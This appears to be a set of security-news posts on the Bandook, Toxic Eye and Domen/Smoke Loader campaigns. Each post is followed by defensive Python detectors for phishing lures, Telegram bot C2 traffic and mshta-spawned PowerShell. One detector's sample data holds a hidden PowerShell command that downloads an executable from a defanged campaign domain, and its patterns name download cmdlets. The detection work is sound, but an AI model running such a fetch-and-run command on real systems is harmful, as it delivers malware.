Caliente Bandits Target Spanish Speaking Individuals to Spread Bandook Malware


A new threat group, tracked as TA2721 and commonly known as Caliente Bandits, has been followed by Proofpoint researchers since January 2021. According to the researchers, the group is actively targeting many industries, primarily entertainment and finance.

The group distributes a known but rarely used remote access trojan (RAT), Bandook, using Spanish-language lures. Researchers named the group 'Caliente Bandits' because it sends its lures from Hotmail accounts; the Spanish word "caliente" means "hot."

Researchers began tracking the group in January 2021 and, by around April, observed TA2721 distributing Bandook in weekly email campaigns. Although the group attacks organizations across the world, recipients with Spanish surnames remain the primary target. It is worth noting that the cybersecurity company ESET first disclosed the malware used by the group.

The campaign repeatedly uses the same budget or transaction theme to lure users into opening a PDF. The attached PDF contains a URL and a password; the URL leads to a password-protected archive that installs Bandook.

According to Proofpoint, TA2721 sent emails to fewer than 100 organizations in 2021, including institutions in the United States, Europe, and South America. The attacks concentrated mostly on recipients with Spanish surnames such as Pérez, Castillo, and Ortiz.

Reportedly, the threat actor spread two variants of Bandook, a commodity malware. Researchers also observed the actor adopting detection-evasion measures such as password-protecting the malicious archives.

The threat actor typically sends the links to the Bandook download from Hotmail or Gmail addresses. Terms such as "PRESUPUEST" and "COTIZACION" are commonly found in subject lines and sender names. In one campaign in June, however, the actor shared the URLs directly. From January to June 2021, researchers observed that the links were shortened URLs which redirected to Spideroak[.]com, a legitimate file-hosting service, to download a malicious RAR archive.

Bandook, a remote access trojan (RAT) written in Delphi, has been commercially available in the wild since 2007. It can capture and record audio and video, log keystrokes, and steal data.

The evidence suggests that TA2721 will continue to use a small number of Bandook variants, a similar infection chain, and only a few C2 domains. The precise targeting shows that the threat actor identifies its target entities before the emails are sent.
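The lure pattern described in this post (freemail sender, budget or quotation keywords, a PDF carrying both a download link and a password, a link to a legitimate file host that serves an archive) can be turned into a mail-triage heuristic. The following is an added example, not code from Proofpoint or from the blog; the sample messages are constructed, the Email class and the scoring thresholds are my own assumptions, and the indicator lists are taken only from the description above.

```python
import re
from dataclasses import dataclass

# Indicators summarised from the TA2721 description above.
FREEMAIL_DOMAINS = {"hotmail.com", "gmail.com"}
LURE_KEYWORDS = ("PRESUPUEST", "COTIZACION")       # budget / quotation themes
ABUSED_FILE_HOSTS = {"spideroak.com"}              # legitimate host used to serve the RAR
ARCHIVE_EXTENSIONS = (".rar", ".zip", ".7z")
URL_RE = re.compile(r"https?://[^\s<>\"']+", re.IGNORECASE)
# Spanish or English "password: xxxx" style strings inside the PDF text
PASSWORD_RE = re.compile(r"(contrase[ñn]a|clave|password)\s*[:=]\s*\S+", re.IGNORECASE)


@dataclass
class Email:
    """Minimal mail record (assumed shape, not a real mail-gateway schema)."""
    sender: str
    subject: str
    attachments: list
    pdf_text: str = ""   # text extracted from any attached PDF


def host_of(url):
    m = re.match(r"https?://([^/:]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else ""


def score_bandook_lure(mail):
    """Return the list of TA2721-style indicators present in one message."""
    reasons = []
    domain = mail.sender.rsplit("@", 1)[-1].lower()
    if domain in FREEMAIL_DOMAINS:
        reasons.append("freemail sender")
    header_text = (mail.subject + " " + mail.sender).upper()
    if any(k in header_text for k in LURE_KEYWORDS):
        reasons.append("budget/quotation lure keyword")
    if any(a.lower().endswith(".pdf") for a in mail.attachments):
        urls = URL_RE.findall(mail.pdf_text)
        if urls and PASSWORD_RE.search(mail.pdf_text):
            reasons.append("PDF carries both a download URL and a password")
        for url in urls:
            if host_of(url) in ABUSED_FILE_HOSTS:
                reasons.append("link to abused file host " + host_of(url))
            if url.lower().endswith(ARCHIVE_EXTENSIONS):
                reasons.append("link points directly at an archive")
    return reasons


def is_suspicious(mail, threshold=3):
    """Assumed policy: three or more indicators is enough to quarantine for review."""
    return len(score_bandook_lure(mail)) >= threshold


# Constructed sample messages (not real lures).
SAMPLE_LURE = Email(
    sender="ventas.cotizacion@hotmail.com",
    subject="COTIZACION y presupuesto",
    attachments=["presupuesto.pdf"],
    pdf_text="Descargue el archivo: https://spideroak.com/storage/EXAMPLE/presupuesto.rar\n"
             "Contraseña: 1234",
)
SAMPLE_BENIGN = Email(
    sender="alice@example-corp.com",
    subject="Q3 roadmap",
    attachments=["roadmap.pdf"],
    pdf_text="See the attached roadmap.",
)

if __name__ == "__main__":
    for mail in (SAMPLE_LURE, SAMPLE_BENIGN):
        print(mail.subject, "->", score_bandook_lure(mail), "suspicious:", is_suspicious(mail))
```

Each indicator on its own is weak (plenty of legitimate Spanish-language quotations come from Gmail accounts); the value is in the combination, which is why the function returns the full reason list rather than a single boolean.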

Toxic Eye Malware is Utilizing Telegram


In 2021, numerous users left WhatsApp for other messaging applications that promised better data protection, after the company announced that it would share user metadata with Facebook by default. Many of those users turned to Telegram and Signal, which have proven to be competitive alternatives to WhatsApp.

According to Sensor Tower, Telegram was the most installed application in January 2021, with over 63 million downloads. Telegram chats are still not end-to-end encrypted in the way Signal chats are, and now Telegram has another issue: malware.

Check Point Software's research team recently found that cybercriminals are using Telegram as the communications platform for controlling a malware program named Toxic Eye. It turns out that certain features of Telegram are more convenient for attackers than web-based tools: they now use Telegram bots to control compromised machines.

Toxic Eye is a kind of malware known as a remote access trojan (RAT). A RAT gives an intruder remote control over an infected machine, which means the attacker can steal data from the host, delete or copy files, disrupt the machine's operation, and much more. The Toxic Eye RAT is distributed through an email carrying an encoded EXE file; if the recipient opens the file, it installs the malware on the user's computer.

RATs are comparable to legitimate remote-access programs, which can be used to control a user's device, for instance by technical support staff. RATs, however, install themselves without authorization. They may imitate or hide inside legitimate files, sometimes disguised as a document or embedded in a larger file such as a video game.

Attackers use Telegram to remotely control the malware. Check Point analyst Omer Hofman says that between February and April 2021 the company found 130 Toxic Eye attacks using this tool, and that several properties make Telegram valuable to the criminals who distribute malware.

Firewalls do not block Telegram, and neither do network-control tools. It is a user-friendly app that most people recognize as genuine, so they let their guard down.

The researchers advise against opening email attachments from unknown senders, which should always raise suspicion. Also be wary of attachments that contain a username: malicious emails often put the username or the attachment's name in the subject line. An email is possibly malicious if the sender tries to sound urgent, threatening, or coercive and pressures the user to click a link or attachment or to provide sensitive data. Where possible, use anti-phishing tools.
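The post's point that firewalls let Telegram through means the detection has to come from what the traffic looks like rather than from blocking the destination. A workstation process driving a Telegram bot (polling the Bot API for commands, pushing documents out) is distinguishable from an ordinary user chatting in the client, because bots talk to api.telegram.org over HTTPS paths of the form /bot<token>/<method>. The following added example (my code, not Check Point's or the blog's) applies that rule to constructed egress-proxy log lines; the log format, process names and the KNOWN_BOT_HOSTS allowlist are assumptions, and the bot tokens are placeholders.

```python
import re
from collections import defaultdict

# Bot API calls look like /bot<numeric id>:<secret>/<method>; the token is a secret,
# so we keep only the numeric id for reporting.
BOT_API_RE = re.compile(r"^/bot(\d+):[A-Za-z0-9_-]+/(\w+)")
POLL_METHODS = {"getUpdates"}                              # how a bot receives commands
EXFIL_METHODS = {"sendDocument", "sendPhoto", "sendMessage"}  # how a bot pushes data out
KNOWN_BOT_HOSTS = {"CI-RUNNER-01"}   # assumption: hosts permitted to run Telegram bots

# Constructed proxy log (not real traffic). Assumed format:
# <timestamp> <client host> <process> <destination host> <request path>
SAMPLE_PROXY_LOG = """\
2021-04-12T09:00:01Z WS-17 Telegram.exe web.telegram.org /
2021-04-12T09:00:05Z WS-17 rat-sample.exe api.telegram.org /bot123456:AAEXAMPLETOKEN/getUpdates?offset=1
2021-04-12T09:00:35Z WS-17 rat-sample.exe api.telegram.org /bot123456:AAEXAMPLETOKEN/getUpdates?offset=2
2021-04-12T09:01:05Z WS-17 rat-sample.exe api.telegram.org /bot123456:AAEXAMPLETOKEN/getUpdates?offset=3
2021-04-12T09:01:07Z WS-17 rat-sample.exe api.telegram.org /bot123456:AAEXAMPLETOKEN/sendDocument
2021-04-12T09:02:00Z CI-RUNNER-01 ci-notify.py api.telegram.org /bot999:AAEXAMPLETOKEN2/sendMessage
2021-04-12T09:02:30Z WS-18 chrome.exe api.telegram.org /
"""


def parse_line(line):
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, host, proc, dst, path = parts
    return {"ts": ts, "host": host, "proc": proc, "dst": dst.lower(), "path": path}


def detect_telegram_c2(log_text):
    """Group Bot API calls by (host, process) and alert on hosts not allowed to run bots."""
    activity = defaultdict(lambda: {"polls": 0, "pushes": 0, "bot_ids": set(), "first": None})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["dst"] != "api.telegram.org":
            continue
        m = BOT_API_RE.match(rec["path"])
        if not m:
            continue                      # plain web traffic to the API host, not a bot call
        bot_id, method = m.group(1), m.group(2)
        a = activity[(rec["host"], rec["proc"])]
        a["first"] = a["first"] or rec["ts"]
        a["bot_ids"].add(bot_id)
        if method in POLL_METHODS:
            a["polls"] += 1
        elif method in EXFIL_METHODS:
            a["pushes"] += 1

    alerts = []
    for (host, proc), a in activity.items():
        if host in KNOWN_BOT_HOSTS:
            continue
        alerts.append({
            "host": host,
            "process": proc,
            "first_seen": a["first"],
            "polls": a["polls"],
            "pushes": a["pushes"],
            "bot_ids": sorted(a["bot_ids"]),
            # polling alone is C2-like; pushing documents out raises it to exfiltration
            "severity": "high" if a["pushes"] else "medium",
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_telegram_c2(SAMPLE_PROXY_LOG):
        print(alert)
```

The rule does not block anything, so it survives the objection in the post that Telegram cannot simply be firewalled; it only needs the proxy to log TLS-inspected request paths, which is the one assumption that has to hold in a real deployment.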

Attention! Malvertising Campaigns Using Exploit Kits On The Rise

Of all the things online advertising can be used for, spreading malware is the one that surpasses them all.

Recently, researchers uncovered a new 'malvertising' campaign which, according to sources, was carried out using the "Domen Social Engineering Toolkit".
'Malvertising' (malicious advertising) is the use of online advertising to spread malware. Most typically it is done by inserting malware or malicious advertisements into legitimate advertising web pages or networks.

According to informed sources, the campaign was uncovered while it was using a VPN service as bait. It involved a set of domains that gave Domen's attack mechanism a fresh twist.

According to reports, the campaign was built from 'search-one[.]info' as the fake page, 'mix-world[.]best' as the download site, and 'panel-admin[.]best' as the backend panel.

As reports revealed, the campaign redirected users and exposed them to 'Smoke Loader', a downloader that installs secondary payloads. In this case those payloads were the 'Vidar' stealer, 'Buran' ransomware, and the 'IntelRapid' cryptominer.

Needless to say, this is not the first campaign of this kind to surface. According to sources, Domen malvertising had begun in September of the previous year. The social engineering toolkit was used to compromise a website and trick users into clicking a fake 'Adobe Flash Player' update. Clicking it started a download of "download.hta", which then used PowerShell to connect to "xyxyxyxyxy[.]xyz" and download the 'NetSupport Remote Access Trojan' (RAT).

With the growing use of the internet and online services, building a structured and strong defense to prevent malvertising becomes a top priority.

Hiring security professionals is a prerequisite and a building block of that defense. Keeping up with the latest updates and patches must also be a primary priority.

In most cases, exploit kits are used to deliver the malware payloads. Organizations should therefore have a clear inventory of all their blocking points, so that a malvertising campaign's payloads can be detected and dealt with in time.
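The delivery chain described for the earlier Domen campaign (fake Flash update, download.hta, PowerShell fetching the RAT) leaves a distinctive process lineage on the endpoint: mshta.exe running an .hta from a user-writable folder and then spawning powershell.exe with a download command. The following is an added example of that detection, not code from the blog or from any vendor; the process events are constructed in a Sysmon-like shape, and the paths, process names and the placeholder URL path are assumptions.

```python
import re
from collections import namedtuple

# Constructed process-creation events (not real telemetry): pid, parent pid, image, command line.
Event = namedtuple("Event", "pid ppid image cmdline")
SAMPLE_EVENTS = [
    Event(1000, 4, "explorer.exe", "explorer.exe"),
    Event(2000, 1000, "mshta.exe", r'mshta.exe "C:\Users\u\Downloads\download.hta"'),
    Event(3000, 2000, "powershell.exe",
          'powershell.exe -WindowStyle Hidden -Command "Invoke-WebRequest '
          'http://xyxyxyxyxy[.]xyz/EXAMPLE-PATH -OutFile $env:TEMP\\EXAMPLE.exe"'),
    Event(4000, 1000, "powershell.exe", "powershell.exe Get-Process"),           # benign admin use
    Event(5000, 1000, "mshta.exe", r'mshta.exe "C:\Program Files\Vendor\help.hta"'),  # vendor HTA, no child
]

USER_WRITABLE = re.compile(r"\\(Downloads|Temp|AppData)\\", re.IGNORECASE)
NET_CMDLETS = re.compile(
    r"Invoke-WebRequest|Net\.WebClient|DownloadString|DownloadFile|Start-BitsTransfer",
    re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


def lineage(event, by_pid):
    """Walk parent pointers upward and return the image names, child first."""
    chain, cur = [], event
    while cur is not None:
        chain.append(cur.image)
        cur = by_pid.get(cur.ppid)
    return chain


def detect_hta_powershell_chain(events):
    """Flag powershell.exe whose parent is mshta.exe running an .hta file."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image.lower() != "powershell.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image.lower() != "mshta.exe":
            continue
        if ".hta" not in parent.cmdline.lower():
            continue
        indicators = ["powershell spawned by mshta"]
        if USER_WRITABLE.search(parent.cmdline):
            indicators.append("HTA launched from user-writable path")
        if NET_CMDLETS.search(e.cmdline):
            indicators.append("PowerShell downloads from the network")
        if HIDDEN_WINDOW.search(e.cmdline):
            indicators.append("hidden window")
        hits.append({
            "pid": e.pid,
            "chain": " <- ".join(lineage(e, by_pid)),
            "indicators": indicators,
        })
    return hits


if __name__ == "__main__":
    for hit in detect_hta_powershell_chain(SAMPLE_EVENTS):
        print(hit)
```

The parent-child relationship is the core of the rule; the other indicators only add confidence, so an environment that legitimately uses HTAs can still keep the alert and tune on the user-writable-path and network-download indicators instead of the lineage.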